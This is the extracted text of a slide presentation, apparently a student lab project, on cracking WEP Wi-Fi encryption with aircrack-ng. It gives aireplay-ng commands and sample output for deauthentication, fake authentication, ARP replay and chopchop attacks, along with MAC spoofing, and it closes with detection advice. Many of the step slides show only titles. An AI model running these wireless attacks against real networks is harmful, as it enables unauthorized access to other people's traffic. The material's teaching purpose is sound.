WEP Crack Using aircrack-ng

Arunabh Das

Content

Part 1 - Background  WEP  Encryption  Authentication  Vulnerabilities Part 2 - Attack Experiment  Cracking WEP Keys  Test Environment  Network Topology  Hardware & Software  The Attack  Observations Part 3 - Conclusion  Problems Encountered  Detection & Prevention  Conclusion  References

WEP Encryption
 Wired

Equivalent Privacy  64-bit and 128-bit (24-bit IV)  Utilizes RC4 and CRC32

WEP Authentication
 Open

System Authentication

http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

WEP Authentication
 Shared

Key Authentication

http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

WEP Vulnerability
 Static

Keys  Short IV (24-bits)  Susceptible to statiscal analysis based attacks

Network Topology
attacker victim

Wireless AP

H/W and S/W requirements
Victim OS: Windows XP NIC: D-Link WUA-2340 USB adaptor Software: D-Link Wireless Connection Manager

ker buntu 8.04 wl4965/Atheros AR5007 b/g are: Kismet Airodump Aireplay Airjack

Wireless AP Linksys WRT54GL

Types of attacks using aireplay
        

It currently implements multiple different attacks: Attack 0: Deauthentication Attack 1: Fake Authentication Attack 2: Interactive Packet Replay Attack 3: ARP Request Replay Attack Attack 4: Korek Chopchop attack Attack 5: Fragmentation attack Attack 6: Caffe-latte attack Attack 7: Client-oriented fragmentation attack

Source - http://www.aircrack-ng.org/doku.php?id=aireplay-ng

Deauthentication

   

This attack is a type of “man-in-the-middle” attack which disassocate packets to one or more clients which are currently associated with paticular access pont, making the client to disconnect from the AP and connect to the cracker’s fake AP. The reasons to disassociating clients are : Generate ARP reqests, Force clients to re-authenticate Recovering a hidden ESSID

Deauthenticaton cont.
Use aireplay to achieve the de-auth attack Command: aireplay-ng -0 1 -a MAC address -c MAC address ath0 -0 means deauthentication 1 is the number of deauths to send -a MAC address of te acess point -c MAC address of the client to de-auth -ath0 is the interface name

Deauthentication cont.
The MAC address of the AP and the client can be get by doing sniffing using tools like wireshark The output of the command from the slid above will look like: 11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30] STMAC is the MAC address of the client(then the client is de-authenticated,and then the attacker will be connected with the spoofed victim’s address)

Fake authentication
 Fake

authentication allows the attacker to proform the two types of WEP authentication (open system and shared key) pls associate with the AP, Different from deauthentication attack, no ARP packets are generated, plus the fake authentication is only useful when the attacker need and associated MAC address in other packet injection attacks but there is currently no client is connected to the AP

Fake auhentication cont.
       

The actual aireplay command: aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -y sharedkeyxor ath0 -1 means fake authentication 0 reassociation timing in seconds -e teddy is the wireless network name -a 00:14:6C:7E:40:80 is the access point MAC address -h 00:09:5B:EC:EE:F2 is our card MAC addresss -y sharedkeyxor is the name of file containing the PRGA xor bits. This is only used for shared key authentication. Open system authentication, which is typical, does not require this.(PRGA xor bits can be obtained from the de-auth or kork chopchop attack). ath0 is the wireless interface name

ARP Request Replay attack

The classic ARP request replay attack is the most effective way to generate new initialization vectors(IVs). The program listens for an ARP packet then retransmits it back to the access point. This, in turn, causes the access point to repeat the ARP packet with a new IV. Te program retransmits the same ARP packet over and over. However, each ARP packet repeated by the access point has a new IVs. It is all these new IVs which allow you to determine the WEP key.

ARP Request Replay attack cont.
     

Basic usage aireplay-ng -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0 Where: -3 means standard arp request replay -b 00:13:10:30:24:9C is the access point MAC address -h 00:11:22:33:44:55 is the source MAC address (either an associated client or from fake authentication) ath0 is the wireless interface name

ARP Request Replay attack cont.
A

output of the above command would be:  Saving ARP requests in replay_arp-0219123051.cap You should also start airodumpng to capture replies. Read 11978 packets (got 7193 ARP requests), sent 3902 packets

KoreK chopchop
 This

attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext.  Some AP are not vulnerable to this attack

KoreK chopchop cont.
   

 

Proform korek chopchop with aireplay aireplay-ng -4 -h 00:09:5B:EC:EE:F2 -b 00:14:6C:7E:40:80 ath0 4 means the chopchop attack -h 00:09:5B:EC:EE:F2 is the MAC address of an associated client or your card's MAC if you did fake authentication -b 00:14:6C:7E:40:80 is the access point MAC address ath0 is the wireless interface name

KoreK chopchop cont.
 

Sample output of the above command Read 165 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:40:F4:77:E5:C9 0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.." 0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C 0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s 0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i. 0x0050: cfeb 4a72 be46 ..Jr.F Use this packet ? y

Fragmentation Attack
 This

attack, when successful, can obtain 1500 bytes of PRGA (pseudo random generation algorithm). This attack does not recover the WEP key itself, but merely obtains the PRGA. The PRGA can then be used to generate packets with packetforge-ng which are in turn used for various injection attacks. It requires at least one data packet to be received from the access point in order to initiate the attack

Korek chopchop vs. Fragmentation Attack
 Fragmentition

attack obtains the full packet length of 1500 bytes xor, so any size of packet could be generated, and is sufficient to create ARP request. An is extremel fast, however, it needs ore information such as the IP address to launch. attack don’t need to know any IP info. Bu t is much slower and the maximum xor its is limited .

 Chopchop

Flow Chart for Cracking

Source – http://www.aircrack-ng.org/doku.php?id=flowchart#section_7frag_chop-chop_failed

Configuring Environment Configure Access Point

Set the encryption to WEP and generate keys using passphrase

Configuring Environment Step 2 Configure Access Point

Set the SSID and the broadcast channel.

Configuring Environment Step3 Configure Access Point

Set the Authentication type to Auto

Installation Installation of kismet step1

Installation Installation of kismet – step2

Installation Installation of kismet step3

Installation Installation of kismet step4

Installation Installation of kismet step5

Installation Installation of kismet step6

Installation Installation of kismet step7

Installation Patching of kernel Step1

Note that the 2.6.24 version of the kernel doesn’t contain the modules that we need

Installation Patching of kernel Step2

Install kernel-package libraries

Installation Patching of kernel Step3

Wait for complete installation of kernel-package libraries

Installation Patching of kernel Step4
Download the latest version of the kernel using wget

Installation Patching of kernel Step4

Installation Patching of kernel Step5

Installation Patching of kernel Step6

Installation Patching of kernel Step7

Installation Patching of kernel Step8

Installation Patching of kernel Step9

Installation Patching of kernel Step10

Installation Patching of kernel Step11

Finding a client that is connected to the AP and client’s MAC id

Installation Patching of kernel Step12

Installation Patching of kernel Step13

Installation – Patching of kernel Step12

Installation Patching of kernel Step13

Installation Patching of kernel Step14-15

Installation Patching of kernel Step16-17

Installation Patching of kernel Step18

Installation Patching of kernel Step19

Installation Patching of kernel Step20

Installation Patching of kernel Step21-23

Installation Patching of kernel Step24

Installation Patching of kernel Step25

Installation Patching of kernel Step26

Installation Patching of kernel Step27-28

Installation Patching of kernel Step29

Installation Patching of kernel Step30

Installation Patching of kernel Step31

Installation Patching of kernel Step32

Installation Patching of kernel Step33

Installation Patching of kernel Step34

Installation Patching of kernel Step35-36

Installation Patching of kernel Step37-38

Installation Patching of kernel Step39-40

Installation Patching of kernel Step41

Installation – Patching of kernel Step42

Installation – Patching of kernel Step43

Installation – Patching of kernel Step44

Installation Patching of kernel Step45

Installation Patching of kernel Step46

Installation
Patching of kernel – 7

Installation
Patching of kernel – 8

Installation
Patching of kernel – 9

Installation
Patching of kernel – Step 50

Installation
Patching of kernel – Step 51

Installation
Patching of kernel – Step 52

Installation
Patching of kernel – Step 53

Installation
Patching of kernel – Step 54

Installation
Patching of kernel – Step 55

Preparatory Step1 Testing Injection

Enable card to monitor mode

Preparatory Step 2 Testing Injection

Basic test to determine if card supports injection

Preparatory – Testing Injection

Check hidden ID or check specific SSID

Preparatory Testing Injection
Create 2 virtual wireless interfaces for attack test

Preparatory Step 5 Testing Injection

Reconnaisance Step 1

Reconnaisance Step 2

Reconnaisance -

Reconnaisance

Reconnaisance Step 5 -

Reconnaisance Step 6 -

Reconnaisance Step 7 -

Reconnaisance Step 8 -

Reconnaisance Step 9 -

Reconnaisance Step 9 -

Attack Without Deauth – Step1

Attack Without Deauth Step2 -

Attack Without Deauth

Attack Without Deauth

Attack Without Deauth Step5

Attack Without Deauth Step 6

Attack Without Deauth Step 7

Attack Without Deauth Step8

Attack Without Deauth Step 9

Attack Without Deauth Step 10

Attack Without Deauth Step 11

Attack Without Deauth Step 12

Attack Without Deauth Step 13

Iteration 2 – ARP Request Replay without deauthentication request

Attack Step 1

Taking down the network interface in order to change the MAC

Iteration 2 – ARP Request Replay without deauthentication request

Attack Step 2

Finding a target AP and the channel it is broadcasting on.

Iteration 2 – ARP Request Replay without deauthentication request

Attack 

Finding a client that is connected to the AP and client’s MAC id

Iteration 2 – ARP Request Replay with deauthentication request

Attack
Changing the attacker’s MAC id to match client’s (Spoofing)

Iteration 2 – ARP Request Replay with deauthentication request

Attack Step 5 

Initiating airodump to capture packets, especially weak IVS packets

Iteration 2 – ARP Request Replay with deauthentication request

Attack Step 6 

Monitoring airodump to monitor rate of capture

Iteration 2 – ARP Request Replay with deauthentication request

Attack Step 7

Initiate aireplay to inject frames

Iteration 2 – ARP Request Replay with deauthentication request

Attack Step 8

Monitoring number of ARP requests generated

Iteration 2 – ARP Request Replay with deauthentication request

Attack Step 9

Sending de-authentication frames to client

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 1

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 2

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth)

Finding a client that is connected to the AP and client’s MAC id

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth)

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 5 

Initiating airodump to capture packets, especially weak IVS packets

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 6

Monitoring airodump to monitor rate of capture

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 7

Initiate aireplay to inject frames

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 8

Monitoring number of ARP requests generated

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 9

Sending de-authentication frames to client

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 10

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 11

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 12

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 13

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 14

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 15

Using airecrack to crack

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 16

Using airecrack to crack

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 17

Using airecrack to crack

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 18

Using airecrack to crack

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 19

Using airecrack to crack

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 20

Using airecrack to crack

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 21

Using airecrack to crack

ARP Request Replay Attack Variation 3 (spoofing MAC but no deauth) Step 22

Using airecrack to crack

Observations/Conclusion
  

WEP is weak and can be cracked easily We were able to crack WEP in x minutes WEP encrypted networks should be replaced with WPA/WPA2

Detection/Prevention
 When

an abnormal amount of ARP requests are being made it may be a sign that a hacker is trying to crack your WEP key  Careful monitoring and logging of such an event can help administrators detect such an attack.  Preventing such an attack is near impossible

References
[1] “Aireplay-ng” URL: http://www.aircrack-ng.org/doku.php?id=aireplay-ng [2] “Computer Security” URL: http://en.wikipedia.org/wiki/Computer_security [3] “Exploit (computer security)” URL: http://en.wikipedia.org/wiki/Exploit_(computer_security)

Questions ?

Sign up to vote on this title
UsefulNot useful